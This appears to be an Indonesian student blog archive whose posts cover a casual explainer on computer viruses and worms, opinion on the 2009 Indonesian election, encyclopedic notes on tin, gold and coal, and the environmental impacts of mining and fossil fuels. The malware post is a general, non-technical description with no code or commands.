Kalo ditanya berapa jumlah malware, wah itu mah banyak, gak bisa dijumlahin berapa pastinya. Tapi pada umumnya malware (program jahat) tuh ada 2, yaitu virus dan worm. Bagi yang telah paham dan mengerti soal jaringan, tentu tidak akan bertanya-tanya apa seh itu virus, kenapa kok bisa ada di komputerku, dan yang lebih nyeleneh lagi ada yang bertanya apakah virus itu hidup seperti virus-virus yang ada pada manusia, apa kita bisa tertular, dan lain-lainnya.. Hahahaha:-D
Saya akan coba jelaskan bagi yang belum memahami apa itu virus dan worm (pada komputer dan jaringan ya, bukan yang pada manusia atau hewan, kalo yang itu mah urusan bapak sama ibu dokter).


1. VIRUS

Virus pada dasarnya adalah sebuah perintah jahat untuk melumpuhkan suatu sistem, jaringan, atau data-data lain, bahkan menghapusnya. Virus ditulis dengan fungsi mampu menyamarkan dirinya menjadi file video, file audio, dokumen word, dan dalam bentuk apapun, melekatkan dirinya pada aplikasi lain, dan menduplikasikan dirinya pada aplikasi-aplikasi lain dan pada semua drive. Penyamaran itu tujuannya seh cuma 1, yaitu agar pengguna komputer (calon korban) tertarik untuk meng-klik sehingga virusnya langsung bangun (aktif maksudnya, hehehe..). Jadi ingat, virus itu sebenarnya sebuah perintah eksekusi yang ditulis oleh si pembuat virus dengan fungsi tertentu, sama seperti aplikasi lainnya, aplikasi yang sering kita gunakan itu juga berawal dari sekumpulan perintah yang ditulis dengan bahasa pemrograman, cuma aplikasi-aplikasi yang sering kita pakai memang terdiri dari perintah-perintah yang baik baik aja, nah kalo si virus ini emang pada dasarnya dirancang dengan perintah-perintah jahatnya yang gunanya untuk merusak aja alias gak ada baik-baiknya deh.. makanya disebut malware.

Ciri-ciri yang seringkali muncul setelah komputer dihinggapi virus adalah: Sistem operasi berjalan lambat sekali, sering terjadi restart, dan penggandaan folder atau file tertentu.


2. WORM

Nah, apalagi tuh, worm? Cacing?? Bukann.... Begini, dulu banget tahun 1975 komputer dan jaringan internet udah ada dan masih dalam pengembangan, dasar iseng, dua peneliti dari sebuah perusahaan (saya lupa perusahaan apa, yang pasti nama awalnya Xerox) membuat sebuah program yang dapat menduplikasikan diri secara otomatis dan tugasnya untuk meningkatkan siklus CPU secara efisien melewati ke seluruh jaringan. Mereka mencoba membiarkan program ini diluar kontrol untuk mengetahui akibatnya, dan akibatnya adalah sistem komputer menjadi down. Pengertian dari worm itu sendiri bagaimana? Masih gak ngerti...? Ckckckck....
Neh saya jelasin lagi, worm itu adalah suatu program atau algoritma yang mereplikasikan dirinya sendiri pada jaringan komputer dan biasanya melakukan tindakan-tindakan merugikan, seperti menggunakan sumber-sumber komputer untuk mematikan sistem.. Mirip sama virus..

Sejak si hacker handal Robert Tappan Morris menciptakan worm Morris Worm, yang menyebabkan program error diluar kontrol dan secara efektif mereplesikan dirinya sendiri melalui internet, melimpahi sumber-sumber data dan akhirnya mematikan sistem secara keseluruhan, dunia internet sudah terancam eksistensinya..

Saya sendiri untuk mengerti apa itu virus dan worm, mencobanya pada komputer saya. Ya, virus-virus yang saya dapat dari komputer-komputer teman ataupun komputer-komputer warnet (itulah mengapa saya tidak pernah tetap di satu warnet, selalu coba-coba warnet lain, kalau-kalau ada virus atau worm-nya). Komputer saya tersayang akhirnya sering sakit-sakitan alias rusak. Pernah suatu ketika saya dimarahi habis-habisan oleh bapak saya karena file-file kerjanya ada yang rusak dan hilang. Saya tidak diperbolehkan memakai komputer itu lagi, sampai akhirnya komputer kami rusak berat dan dibawa saudara kembar saya ke jambi untuk dibenerin dan dipakainya. Hiks...hiks..hiks..;'( Tapi ada sisi positifnya juga, saya jadi tau bagaimana worm dan virus bekerja. Menurut saya, setelah melakukan serangan atau menginfeksi, worm memperoleh kontrol atas web server melalui buffer overflow (gak tau juga? ntar deh saya tulis mengenai buffer overflow), selanjutnya worm mulai melakukan proses infeksi dengan cara membuat daftar alamat IP random (acak). Setelah itu worm melanjutkan infeksinya pada sumber daya lain yang terhubung atau terkoneksi dengan lingkungan yang telah terinfeksi, setelah proses itu, jreng...jreng...jreeenggg... sang worm tidak membutuhkan manusia atau sipembuatnya, worm akan menyebar dengan sendirinya dan bersifat aktif!! Ia akan mencari celah yang tidak terproteksi untuk menyebar. Bisa dari e-mail, web, file html, dan network share.. Saya pernah melihat di komputer warnet bu Sri, dosen saya, nama warnetnya WARNET CENTRAL IT, alamatnya di pasar bawah - Muara Bungo (nah bu, udah saya promosiin neh, hehehe...) ada satu worm di salah satu komputer warnetnya (saya lupa yang mana, yang jelas dekat meja operator) yang menyebar melalui file html yang tersimpan

Minggu

Warna warni Pemilu 2009

Sebelum pemilu diadakan, wajar jika suasana politik menjadi panas. Ada yang melakukan lobi-lobi ke daerah, kampanye hitam, serta manuver-manuver lainnya yang dilakukan oleh para politikus, partai dan simpatisannya..

Ya, pemilu langsung yang untuk kedua kalinya digelar di negeri ini telah menjadi perhatian dunia. Sebut saja Malaysia, Amerika Serikat, Denmark, Belgia dan Australia mengirim utusannya datang ke Indonesia demi menyaksikan perhelatan akbar demokrasi di negeri kita. Sebelumnya pada pemilu langsung yang pertama pada tahun 2004 memang berjalan dengan sukses dan mengundang perhatian dunia. Indonesia disebut negara berpenduduk muslim terbesar di dunia dan memiliki kompleksitas yang begitu tinggi ternyata mampu menjalankan roda demokrasi di wilayahnya. Tentunya kita bangga atas penghargaan dari negara-negara sahabat.

Ada 1 hal yang mengganggu pikiran saya, apakah benar Indonesia telah benar-benar berhasil menjalankan prinsip-prinsip demokrasi?? Jika melihat pemilu tahun ini malu rasanya setelah apa yang telah dikatakan oleh negara-negara sahabat mengenai demokrasi kita. Kita digadang-gadang menjadi kiblat negara demokrasi di wilayah asia, namun dalam pelaksanaannya penuh dengan cacat. KPU sebagai pihak yang berkompeten dalam hal ini tidak mampu mengatasi tekanan-tekanan dan melepas bayang-bayang kesuksesan di pemilu sebelumnya.

Sudah menjadi rahasia umum jika pemilu tahun 2009 ini adalah yang terburuk sejak era reformasi negeri kita. Begitu banyak masalah yang muncul, entah itu karena banyaknya partai peserta pemilu, cara penetapan DPS dan DPT yang tidak tepat hingga menimbulkan pemilih ganda, sampai kurangnya sosialisasi yang dilakukan mengenai tata cara pemilu yang memang menggunakan cara baru. Ah, memang benar kata pepatah dulu, ketika pohon masih kecil, ia akan aman dari tiupan kencang dari angin, namun ketika pohon telah semakin besar dan tinggi, takkan pernah angin berhenti menerpanya.


Para peserta capres pada pemilu 2009 ini kebanyakan lebih mempertontonkan ketidakkonsistenannya sendiri. Sebut saja PDI-P bersama bu Mega. Di awal-awal kampanyenya bisa dikatakan inilah partai yang paling gigih sebagai partai oposisi. Bantuan Langsung Tunai atau BLT merupakan program pemerintah yang paling sering disorotnya. "Pemberian BLT adalah membodohi rakyat, daripada uang yang dibagi-bagikan lebih baik digunakan untuk membangun infrastruktur masyarakat, itu jelas kelihatan mamfaatnya", begitulah bunyi dari kampanyenya yang saya lihat di televisi. Nampaknya bu Mega dan partainya tidak memahami arti dan esensi dari pemberian BLT. Maksud pemerintah baik kok dibilang membodohi rakyat?? (saya bukan membelain pemerintah, tapi ini menurut pengamatan saya).

Coba anda kaji sendiri penjelasan saya berikut ini:
Pada saat itu harga minyak dunia melambung tinggi, pemerintah mau tidak mau harus menaikkan harga BBM demi menyelamatkan APBN, APBN itu sudah dirancang di awal tahun dan disahkan DPR, jadi tidak bisa seenaknya merubah biaya belanja negara.. Balik lagi ke masalah BLT, nah ketika harga BBM sudah naik, harga sembako dan kebutuhan pokok lainnya juga ikut naik, tapi PENDAPATAN ATAU DAYA BELI MASYARAKAT TETAP-TETAP SAJA ATAU BAHKAN TURUN, maka diperlukan langkah-langkah untuk menyelamatkan masyarakat kecil yang tidak mampu, yaitu dengan pemberian BLT lah cara pemerintah. Dengan memberi uang langsung, diharapkan bisa menjaga daya beli mereka tadi untuk tetap tinggi atau tidak jatuh.. Anda mengerti kan sekarang?

Kembali pada permasalahan bu Mega dan PDI-P, ada ketidakkonsistenan yang ditunjukkan mereka dalam sikapnya mengenai BLT. Jika awalnya mengatakan BLT itu membodohi rakyat, sekarang malah mengatakan "kami mengawal pemberian BLT kepada masyarakat" ini kan lucu. Entah apa yang ada di benak mereka. Apakah ada kepentingan-kepentingan politiskah yang membuat mereka ganti strategi, saya tidak tahu.

Pak JK begitu juga halnya. Sebelum pileg dilaksanakan, sebagai kandidat dari partai Golkar yang merupakan partai pemenang pemilu tahun 2004 merasa yakin akan menang atau paling tidak sukses lagi. Ia mengeluarkan pernyataan bahwa dapat lebih cepat dan lebih tegas jika menjadi presiden. Pernyataan ini jelas melukai sang partner, SBY, ujung-ujungnya jelas SBY meninggalkan JK. Terbukti ketika hasil pileg telah diketahui dan partai Demokrat sebagai pemenangnya, JK berusaha merapat lagi ke SBY, tapi sayang nasi telah menjadi bubur. Jika pak JK mengatakan "keadaanlah yang membuat SBY-JK berpisah" maka pak JK lah yang membuat keadaan itu. Andai saja ia tidak termakan provokasi (salah satu kader partai demokrat keseleo lidah, mengatakan kalau partai demokrat belum tentu berkoalisi lagi dengan Golkar), dan sabar serta tidak bereaksi berlebihan menanggapi masalah itu, dan menunggu klarifikasi langsung dari SBY, tentu saja kebersamaannya dengan SBY takkan berakhir.

SBY? Setelah putus dari JK, bak gadis cantik, tidak sulit baginya menemukan pasangan baru. Namun tampaknya pasangan barunya memiliki kesamaan dengan sang mantan;)

TIMAH

Timah adalah sebuah unsur kimia dalam tabel periodik yang memiliki simbol Sn (bahasa Latin: stannum) dan nomor atom 50. Timah merupakan logam berwarna putih keperakan, dengan kekerasan yang rendah, dapat ditempa ("malleable"), berat jenis 7,3 g/cm3, serta mempunyai sifat konduktivitas panas dan listrik yang tinggi. Dalam keadaan normal (13 – 1600C), logam ini bersifat mengkilap dan mudah dibentuk. Timah juga tidak mudah teroksidasi dalam udara sehingga tahan karat, ditemukan dalam banyak aloy, dan digunakan untuk melapisi logam lainnya untuk mencegah karat.

Timah diperoleh terutama dari mineral cassiterite yang terbentuk sebagai oksida. Timah terbentuk sebagai endapan primer pada batuan granit dan pada daerah sentuhan batuan endapan metamorf yang biasanya berasosiasi dengan turmalin dan urat kuarsa timah, serta sebagai endapan sekunder, yang di dalamnya terdiri dari endapan alluvium, elluvial, dan koluvium.

Mineral yang terkandung di dalam bijih timah pada umumnya mineral utama yaitu kasiterit, sedangkan pirit, kuarsa, zircon, ilmenit, plumbum, bismut, arsenik, stibnite, kalkopirit, kuprit, xenotim, dan monasit merupakan mineral ikutan.
Kegunaan timah banyak sekali terutama untuk bahan baku logam pelapis, solder, cendera mata, dan lain-lain.
Potensi Timah di Indonesia terdapat di Pulau Bangka, Pulau Belitung, Pulau Singkep, dan Pulau Karimun.


Ciri-Ciri Fisik

Keadaan benda : Padat
Titik lebur : 505.08 K (449.47 °F)
Titik didih : 2875 K (4716 °F)
Volume molar : 16.29 ×10-6 m3/mol
Kalor penguapan : 295.8 kJ/mol
Kalor peleburan : 7.029 kJ/mol
Tekanan uap : 5.78 E-21 Pa at 505 K
Kecepatan suara : 2500 m/s pada 293.15 K

Properti Atomik

Bobot atom : 118.710 sma
Jari-jari atom : 145 (145) pm
Jari-jari kovalen : 141 pm
Jari-jari van der Waals : 217 pm
Konfigurasi elektron : [Kr]4d10 5s2 5p2
Elektron per tingkat energi : 2, 8, 18, 18, 4
Bilangan oksidasi (Oksida) : 4,2 (amfoter)
Struktur kristal :Tetragonal


Sifat

Timah biasa terbentuk oleh 9 isotop yang stabil. Ada 18 isotop lainnya yang diketahui. Timah merupakan logam perak keputih-putihan, mudah dibentuk, ductile dan memilki struktur kristal yang tinggi. Jika struktur ini dipatahkan, terdengar suara yang sering disebut “tin cry” (tangisan timah) ketika sebatang unsur ini dibengkokkan.



Bentuk

Unsur ini memiliki 2 bentuk alotropik pada tekanan normal. Jika dipanaskan, timah abu-abu (timah alfa) dengan struktur kubus berubah pada 13.2 derajat Celcius menjadi timah putih (timah beta) yang memiliki struktur tetragonal. Ketika timah didinginkan sampai suhu 13,2 derajat Celcius, ia pelan-pelan berubah dari putih menjadi abu-abu. Perubahan ini disebabkan oleh ketidakmurnian (impurities) seperti aluminium dan seng, dan dapat dicegah dengan menambahkan antimoni atau bismut. Perubahan dari bentuk alfa ke bentuk beta dinamakan “tin pest”. Timah abu-abu memiliki sedikit kegunaan. Timah dapat dipoles sangat licin dan digunakan untuk menyelimuti logam lain untuk mencegah korosi dan aksi kimia. Lapisan tipis timah pada baja digunakan untuk membuat makanan tahan lama.


Campuran logam timah sangat penting. Solder lunak, perunggu, logam babbit, logam bel, logam putih, campuran logam bentukan dan perunggu fosfor adalah beberapa campuran logam yang mengandung timah.
Timah dapat menahan air laut yang telah didistilasi dan air keran, tetapi mudah terserang oleh asam yang kuat, alkali dan garam asam. Oksigen dalam suatu solusi dapat mempercepat aksi serangan kimia-kimia tersebut. Jika dipanaskan dalam udara, timah membentuk Sn2, sedikit asam, dan membentuk stannate salts dengan oksida. Garam yang paling penting adalah klorida, yang digunakan sebagai agen reduksi. Garam timah yang disemprotkan pada gelas digunakan untuk membuat lapisan konduktor listrik. Aplikasi ini telah dipakai untuk kaca mobil yang tahan beku. Kebanyakan kaca jendela sekarang ini dibuat dengan mengapungkan gelas cair di dalam timah cair untuk membentuk permukaan datar (proses Pilkington).
Baru-baru ini, campuran logam kristal timah-niobium menjadi superkonduktor pada suhu sangat rendah, menjadikannya sebagai bahan konstruksi magnet superkonduktif yang menjanjikan. Magnet tersebut, yang terbuat oleh kawat timah-niobium memiliki berat hanya beberapa kilogram tetapi dengan baterai yang kecil dapat memproduksi medan magnet hampir sama dengan kekuatan 100 ton elektromagnet yang dijalankan dengan sumber listrik yang besar.


DAMPAK DARI TIMAH/PENAMBANGANNYA

Timah juga terdapat dalam beberapa makanan. Jumlah timah yang sedikit dalam makanan tidak berbahaya. Limit dalam makanan di Amerika Serikat adalah 300 mg/kg. Senyawa timah triakil dan triaril digunakan sebagai racun biologi (biocides) dan perlu ditangani secara hati-hati. Limbah-limbah utama yang dihasilkan dari penambangannya berupa Air Asam Tambang dan Tailing yang mengandung logam dalam kadar tinggi.

EMAS

Emas ialah unsur kimia dalam jadual berkala yang mempunyai simbol Au. Emas merupakan logam lembut, berkilat, berwarna kuning, tumpat, mudah ditempa, mulur, logam peralihan ( trivalen dan univalen ), dan stabil, iaitu tidak bertindak balas dengan kebanyakan bahan kimia. Walau bagaimanapun emas boleh diserang oleh klorin, fluorin dan akua regia. Logam ini selalunya hadir dalam bentuk ketulan nugget di dalam batuan dan longgokan aluvium.


Sifat Emas


Emas ialah unsur logam yang berwarna kuning berkilauan tetapi boleh juga berwarna seperti delima atau hitam apabila dibahagi dengan halus. Larukan koloid emas pula mempunyai warna berkeamatan tinggi yang biasanya berwarna ungu. Warna yang terdapat pada emas adalah disebabkan oleh frekuensi plasmon emas yang terletak pada julat penglihatan, mengakibatkan warna merah dan kuning dipantulkan sementara warna biru diserap. Hanya koloid perak mempunyai interaksi yang sama terhadap cahaya, tetapi dalam frekuensi yang lebih pendek, sehingga menyebabkan warna koloid perak menjadi kuning. Emas juga merupakan logam yang paling boleh tempa dan dimulurkan. Satu gram emas boleh ditempa menjadi satu kerajang bersaiz satu meter panjang dan satu meter lebar atau 1 auns kepada 300 kaki². Emas biasanya dialoikan dengan logam yang lain untuk menjadikannya lebih keras.

Emas merupakan pengalir haba dan elektrik yang baik, dan tidak dipengaruhi oleh udara dan kebanyakan reagen. Secara kimianya, logam emas tidak boleh diubah oleh haba, kelembapan, dan kebanyakan agen menghakis dan oleh itu ia amat sesuai digunakan sebagai duit syiling dan barangan kemas.

Emas tulen mengandungi antara 8% dan 10% perak, tetapi biasanya kandungan tersebut lebih tinggi. Aloi semula jadi dengan kandungan perak yang tinggi dipanggil elektrum. Apabila kuantiti perak bertambah, warnanya menjadi lebih putih dan ketumpatan tentunya berkurangan.

Aloi dengan kuprum menghasilkan logam kemerahan, aloi besi berwarna hijau, dan aloi aluminum berwarna ungu. Barang kemas yang dibuat dengan kombinasi emas yang berwarna dijual di Amerika Syarikat dan dikenali sebagai emas Black Hills.
Keadaan pengoksidaan emas yang biasa termasuk +1 dan +3.



Unsur Kimia Emas


Emas, Au, bernomor atom 79. Artinya, emas mempunyai 79 proton pada intinya. Massa atom emas adalah 196,967 dan jari-jari atomnya 0,1442 nm. Perhitungan itu menarik karena lebih kecil dari perkiraan secara teori. Susunan elektron terluar di seputar inti emas didasarkan pada14 4f, 10 5d, dan 6s kulit elektron (rumusnya [Xe] 4f 14 5d 10 6s).

Susunan elektron ini berkaitan dengan sifat warna kuning emas. Warna logam terbentuk berdasarkan transisi elektron di antara ikatan-ikatan energinya. Kemampuan menyerap cahaya pada panjang gelombang untuk menghasilkan warna emas yang khas terjadi karena transisi ikatan d yang melepaskan posisi di ikatan konduksi. Penambahan unsur-unsur campuran berdampak pada warna emas. Misalnya, penambahan unsur nikel atau paladium akan memutihkan emas.

Jumlah proton pada inti emas tetap 79, tetapi jumlah netron beragam dari satu atom ke atom lainnya sesuai dengan jumlah isotopnya. Meski begitu, hanya ada satu isotop nonradio aktif yang stabil yang terdapat pada semua emas alam yang ditemukan.

Struktur kristal logam emas adalah face centred cubic (FCC, lihat di bawah). Struktur kristal ini memberikan sumbangan bagi kelenturan emas yang tinggi untuk dibentuk karena ruang FCC-nya cocok bagi perpindahan atom. Perpindahan ini sangat penting untuk mencapai tingkat kelenturan yang tinggi.

Tingkat kerapatan emas (19,3 g/cm3) bergantung pada massa atom dan struktur kristalnya. Hal ini membuat emas lebih berat daripada materi logam biasa. Contohnya, aluminium hanya memiliki kerapatan 2,7 g/cm3. Bahkan, baja hanya 7,87 g/cm3.

Titik leleh emas murni adalah 1064 C, meskipun ketika dicampur dengan unsur logam lainnya, seperti perak atau tembaga, logam campuran itu akan meleleh melebihi temperatur yang terukur. Titik didih emas, ketika emas diubah dari cairan menjadi gas, adalah 2860 C.

Kemampuan emas agar efisien mengubah panas dan listrik akan lebih baik jika dicampur dengan tembaga dan perak; menjadikan campurannya tidak teruraike dalam elektron untuk semikonduktor dan konektor pada teknologi komputer. Tahanan listrik emas adalah 0,022 mikro-ohm m pada 20 C. Konduktivitas suhunya 310 W/mK pada suhu yang sama, 20 C. Ketahanan emas terhadap karat untuk dibuat sebagai alat adalah yang paling baik. Energi potensial elektrodanya diukur dibandingkan dengan hidrogen dan rangkaian elektrokimia disiapkan untuk logam sebagaimana disebut di bawah. Tidak mengherankan, jika emas berada pada posisi teratas dari rangkaian yang menunjukkan ketahanannya terhadap karat. Pada praktiknya, emas hanya berkarat jika dicampur dengan nitrat dan asam hidroklorida (aqua regia). Dalam penggunaan sehari-hari, emas tidak luntur. Emas hanya terurai di dalam sianida.



Emas sebagai Katalis

Katalis adalah unsur atau senyawa yang mempercepat proses reaksi kimia yang tidak terpakai dalam reaksi itu. Katalis adalah komponen yang penting dalam berbagai proses industri yang digunakan untuk menghasilkan bahan kimia, makanan, dan lain-lainnya. Mungkin, penggunaan katalis yang pertama kali dilakukan adalah pada proses fermentasi gula untuk mendapatkan alkohol.

Katalis digolongkan homogen atau heterogen bergantung pada tahap keterlibatan katalis dengan reaktan dalam proses reaksi. Katalis homogen berfungsi di dalam tahap yang sama dengan dengan reaktan dan biasanya dalam tahap cairan. Adapun pada katalis heterogen, ada batas yang membedakan antara katalis dan reaktan. Contohnya, padat sebagai katalis, tetapi gas sebagai reaktan seperti di dalam proses perubahan katalis yang dipakai pada industri mobil.

Emas telah menjadi perhatian banyak peneliti sebagai bahan katalis industri hingga kini. Pada dekade terakhir, ada peningkatan yang tinggi dalam penggunaan emas sebagai bahan katalis karena mampu berperan sebagai katalis reaksi kimia dalam lingkup yang luas, termasuk oksidasi, hidrogenasi, dan banyak lagi. Kedua golongan katalis, homogen atau heterogen, sangat mungkin dengan menggunakan emas.

Salah satu yang paling mengesankan dengan menggunakan emas sebagai katalis adalah suhu light off yang diraih (yaitu, suhu tertentu yang memungkinkan katalis dapat berfungsi). Secara potensial, katalis emas lebih baik fungsinya pada suhu 200-350K dibandingkan dengan katalis platina yang hasil terbaiknya baru tercapai pada suhu 400-800K. Tidak seperti kelompok katalis logam platina, adanya tingkat kelembaban ternyata lebih menguntungkan daripada merugikan. Tidak biasanya, emas akan menggantikan secara luas logam platina dari posisi dominan sebagai logam katalis yang berharga. Lebih lagi, emas berpotensi sebagai katalis pada reaksi-reaksi baru dan dalam beberapa hal menawarkan pemecahan sebagai alternatif dengan biaya yang lebih murah.

Salah satu yang menjadi ide bagi para peneliti industri atau akademisi adalah cara kerja yang memungkinkan emas dapat digunakan sebagai katalis untuk penggunaan yang lebih luas. Pengajaran di sekolah-sekolah klasik menegaskan persepsi kita tentang emas yang keras, mudah karatan, dan mudah tergores. Terlepas dari itu, kemungkinan satu mekanisme yang disarankan adalah mekanisme penggunaan emas sebagai katalis. Penggunaan emas sebagai katalis memerlukan penanganan yang hati-hati dan persiapan logam emas yang tidak biasa, memusatkan pada menghasilkan ukuran partikel emas yang sangat kecil. Teknik deposisi-presipitasi (kondensasi) menjadi prosedur yang paling dapat diandalkan. Katalis emas pada akhirnya akan memainkan peran yang penting dalam peningkatan kualitas udara bagi lingkungan penambangan bawah tanah.



DAMPAK YANG DITIMBULKAN DARI PENAMBANGAN EMAS



Pertambangan emas menghasilkan limbah yang mengandung merkuri, yang banyak digunakan penambang emas tradisional atau penambang emas tanpa izin, untuk memproses bijih emas. Biasanya mereka membuang dan mengalirkan limbah bekas proses pengolahan pengolahan ke selokan, parit, kolam atau sungai. Merkuri tersebut selanjutnya berubah menjadi metil merkuri karena proses alamiah. Bila senyawa metil merkuri masuk ke dalam tubuh manusiamelalui media air, akan menyebabkan keracunan seperti yang dialami para korban Tragedi Minamata. Ada 3 jenis limbah utama pertambangan emas. Batuan limbah (overburden) adalah batuan permukaan atas yang dikupas untuk mendapatkan batuan bijih atau batuan yang mengandung emas. Selanjutnya ada tailing - bijih emas yang sudah diambil emasnya menggunakan bahan kimia - diantaranya Merkuri atau Sianida. Tailing berbentuk lumpur yang mengandung logam berat. Limbah yang mengandung logam berat seperti Merkuri dan Sianida termasuk dalam kelompok Limbah B3. Terakhir, air asam tambang - limbah yang menyebabkan kondisi keasaman tanah, yang berpotensi melarutkan unsur mikro berbahaya dalam tanah - sehingga berpotensi meracuni tanaman dan mahluk hidup sekitarnya. Pertambangan ini merupakan industri rakus air. Penggunaan air dari sumber-sumbernya dengan skala besar untuk menjalankan proses pengolahan batuan menjadi bijih logam. Luar biasa tingginya kebutuhan air untuk operasi industri tambang menyebabkan pemenuhan air warga setempat dikalahkan, sering mereka harus rela mencari mata air baru atau harus berhadapan dengan kekerasan untuk mempertahankan sumber air mereka. Jangan lupa, pada saat pembuatan lobang (pit) penambangan dan pembangunan pabrik serta instalasi lainnya, kegiatan pengupasan tanah, peledakan, serta pengoperasian alat-alat berat pengangkut tanah dan lalu lalang kendaraan berat dengan intensitas tinggi menjadi sumber pencemaran udara - akibat peningkatan volume debu. Apa akibatnya? Penduduk lokal harus berhadapan dengan perusakan lingkungan yang luar biasa karena limbah tambang. Umumnya, tailing dibuang ke daerah lembah dengan membuat penampung (tailing dam), dibuang ke sungai hingga ke laut - biasa disebut STD. Submarine Tailing Disposal (STD), dipromosikan oleh pelaku pertambangan sebagai cara pembuangan limbah yang paling baik dan ramah lingkungan, termasuk di Lembata.

DAMPAK DARI MINYAK BUMI DAN BATUBARA

Pada posting sebelumnya saya sudah membahas masalah mengenai dampak yang ditimbulkan dari batubara. Nah, pada posting kali ini saya menambahkan sedikit masih mengenai dampak-dampak dari batubara dan bahan bakar fosil lainnya. Minyak bumi dan batubara sama-sama merupakan energi dari pembakaran sumber energi fosil. Energi dari pembakaran fosil melepaskan gas-gas, antara lain karbon dioksida (CO2), nitrogen oksida (NOx),dan sulfur dioksida (SO2) yang menyebabkan pencemaran udara (hujan asam, smog dan pemanasan global).

Emisi NOx (Nitrogen oksida) adalah pelepasan gas NOx ke udara. Di udara, setengah dari konsentrasi NOx berasal dari kegiatan manusia (misalnya pembakaran bahan bakar fosil untuk pembangkit listrik dan transportasi), dan sisanya berasal dari proses alami (misalnya kegiatan mikroorganisme yang mengurai zat organik). Di udara, sebagian NOx tersebut berubah menjadi asam nitrat (HNO3) yang dapat menyebabkan terjadinya hujan asam.
Emisi SO2 (Sulfur dioksida) adalah pelepasan gas SO2 ke udara yang berasal dari pembakaran bahan bakar fosil dan peleburan logam. Seperti kadar NOx di udara, setengah dari konsentrasi SO2 juga berasal dari kegiatan manusia. Gas SO2 yang teremisi ke udara dapat membentuk asam sulfat (H2SO4) yang menyebabkan terjadinya hujan asam.
Emisi gas NOx dan SO2 ke udara dapat bereaksi dengan uap air di awan dan membentuk asam nitrat

(HNO3) dan asam sulfat (H2SO4) yang merupakan asam kuat. Jika dari awan tersebut turun hujan, air hujan tersebut bersifat asam (pH-nya lebih kecil dari 5,6 yang merupakan pH “hujan normal”), yang dikenal sebagai “hujan asam”. Hujan asam menyebabkan tanah dan perairan (danau dan sungai) menjadi asam. Untuk pertanian dan hutan, dengan asamnya tanah akan mempengaruhi pertumbuhan tanaman produksi. Untuk perairan, hujan asam akan menyebabkan terganggunya makhluk hidup di dalamnya. Selain itu hujan asam secara langsung menyebabkan rusaknya bangunan (karat, lapuk).

Smog merupakan pencemaran udara yang disebabkan oleh tingginya kadar gas NOx, SO2, O3 di udara yang dilepaskan, antara lain oleh kendaraan bermotor, dan kegiatan industri. Smog dapat menimbulkan batuk-batuk dan tentunya dapat menghalangi jangkauan mata dalam memandang.

Emisi CO2 adalah pemancaran atau pelepasan gas karbon dioksida (CO2) ke udara. Emisi CO2 tersebut menyebabkan kadar gas rumah kaca di atmosfer meningkat, sehingga terjadi peningkatan efek rumah kaca dan pemanasan global. CO2 tersebut menyerap sinar matahari (radiasi inframerah) yang dipantulkan oleh bumi sehingga suhu atmosfer menjadi naik. Hal tersebut dapat mengakibatkan perubahan iklim dan kenaikan permukaan air laut.

Emisi CH4 (metana) adalah pelepasan gas CH4 ke udara yang berasal, antara lain, dari gas bumi yang tidak dibakar, karena unsur utama dari gas bumi adalah gas metana. Metana merupakan salah satu gas rumah kaca yang menyebabkan pemasanan global.

Khusus batubara selain menghasilkan pencemaran (SO2) yang paling tinggi, juga menghasilkan karbon dioksida terbanyak per satuan energi. Membakar 1 ton batubara menghasilkan sekitar 2,5 ton karbon dioksida. Untuk mendapatkan jumlah energi yang sama, jumlah karbon dioksida yang dilepas oleh minyak akan mencapai 2 ton sedangkan dari gas bumi hanya 1,5 ton. Sedangkan minyak bumi sendiri mengandung senyawa dengan ikatan nCH.....OH. Kalau ini dibakar, maka senantiasa akan terjadi sisa pembakaran, baik karbon, residu maupun asap. Selama masih ada paru-paru bumi dalam bentuk hutan lindung, dengan pepohonan zat hijau daun yg membutuhkan CO2 untuk proses asimilasinya.

Dampak Terhadap Perairan

Eksploitasi minyak bumi, khususnya cara penampungan dan pengangkutan minyak bumi yang tidak layak, misalnya: bocornya tangker minyak atau kecelakaan lain akan mengakibatkan tumpahnya minyak (ke laut, sungai atau air tanah) dapat menyebabkan pencemaran perairan. Pada dasarnya pencemaran tersebut disebabkan oleh kesalahan manusia. Pencemaran air oleh minyak bumi umumnya disebabkan oleh pembuangan minyak pelumas secara sembarangan. Di laut sering terjadi pencemaran oleh minyak dari tangki yang bocor. Adanya minyak pada permukaan air menghalangi kontak antara air dengan udara sehingga kadar oksigen berkurang.


Hhhmmm kalau ada kekurangan mohon aja dimaklumin, ini merupakan tugas dari mata kuliah Pengenalan Lingkungan Tambang, dan lagian dosennya udah menyetujuinya koqqqq...

BATUBARA

Batubara adalah salah satu bahan bakar fosil. Pengertian umumnya adalah batuan sedimen yang dapat terbakar, terbentuk dari endapan organik, utamanya adalah sisa-sisa tumbuhan dan terbentuk melalui proses pembatubaraan. Unsur-unsur utamanya terdiri dari karbon, hidrogen dan oksigen. Batubara juga adalah batuan organik yang memiliki sifat-sifat fisika dan kimia yang kompleks yang dapat ditemui dalam berbagai bentuk. Analisa unsur memberikan rumus formula empiris seperti C137H97O9NS untuk bituminus dan C240H90O4NS untuk antrasit.


Kelas dan jenis batubara

Berdasarkan tingkat proses pembentukannya yang dikontrol oleh tekanan, panas dan waktu, batubara umumnya dibagi dalam lima kelas: antrasit, bituminus, sub-bituminus, lignit dan gambut.

o Antrasit adalah kelas batubara tertinggi, dengan warna hitam berkilauan (luster) metalik, mengandung antara 86% - 98% unsur karbon (C) dengan kadar air kurang dari 8%.
o Bituminus mengandung 68 - 86% unsur karbon (C) dan berkadar air 8-10% dari beratnya. Kelas batubara yang paling banyak ditambang di Australia.
o Sub-bituminus mengandung sedikit karbon dan banyak air, dan oleh karenanya menjadi sumber panas yang kurang efisien dibandingkan dengan bituminus.
o Lignit atau batubara coklat adalah batubara yang sangat lunak yang mengandung air 35-75% dari beratnya.
o Gambut, berpori dan memiliki kadar air di atas 75% serta nilai kalori yang paling rendah.




Pembentukan batubara

Proses perubahan sisa-sisa tanaman menjadi gambut hingga batubara disebut dengan istilah pembatubaraan (coalification). Secara ringkas ada 2 tahap proses yang terjadi, yakni:

o Tahap Diagenetik atau Biokimia, dimulai pada saat material tanaman terdeposisi hingga lignit terbentuk. Agen utama yang berperan dalam proses perubahan ini adalah kadar air, tingkat oksidasi dan gangguan biologis yang dapat menyebabkan proses pembusukan (dekomposisi) dan kompaksi material organik serta membentuk gambut.
o Tahap Malihan atau Geokimia, meliputi proses perubahan dari lignit menjadi bituminus dan akhirnya antrasit.


Gasifikasi batubara

